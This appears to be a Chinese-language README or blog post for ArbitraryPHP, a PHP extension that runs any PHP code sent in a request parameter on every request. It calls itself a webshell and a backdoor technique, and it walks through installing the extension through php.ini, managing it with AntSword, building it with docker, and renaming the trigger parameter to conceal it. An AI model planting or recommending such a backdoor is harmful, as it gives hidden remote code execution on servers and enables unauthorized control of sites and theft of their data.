ArbitraryPHP - 任意PHP代码执行扩展
这是一个实验性的PHP扩展,加载这个扩展后,每次请求将可以执行一段自己的PHP代码。
可用于:
- 管理目标PHP站点(webshell)
- HOOK与分析HTTP执行流程
- 在不修改源代码的情况下控制PHP执行结果
安装
选择对应版本的PHP,下载Releases下的二进制文件安装包,解压并获得相应PHP版本的二进制文件。
执行php -i |grep extension_dir,获取扩展目录:
将二进制文件arbitraryphp.so移动到扩展目录中,并修改php.ini,开启这个扩展:
|
1 |
extension=arbitraryphp.so |
使用
请求任意一个PHP,在参数arbitrary_php中增加任意PHP代码,即可执行:
也可以是POST请求:
使用AntSword管理:
从源码编译
你也可以自己编译扩展,首先安装如下软件:
- docker
编译生成5.4~7.2版本下所有扩展:
|
1 2 |
git clone https://github.com/phith0n/arbitrary-php-extension bash builds.sh |
只生成某个PHP版本的扩展:
|
1 |
docker run -it --rm --name uu -v /root/arbitrary-php:/app tuwen/zephir:7.2 bash /app/build-ext.sh |
自定义执行参数
如果需要自定义请求参数arbitrary_php为其他值,可以修改arbitraryphp/ext/initial/pre_request.h中REQUEST_NAME的值:
|
1 2 3 |
void pre_request(TSRMLS_D); #define REQUEST_NAME "please_edit_it" |
再重新编译扩展即可。
支持
原文连接:ArbitraryPHP – 后门姿势,任意PHP代码执行扩展
所有媒体,可在保留署名、
原文连接的情况下转载,若非则不得使用我方内容。
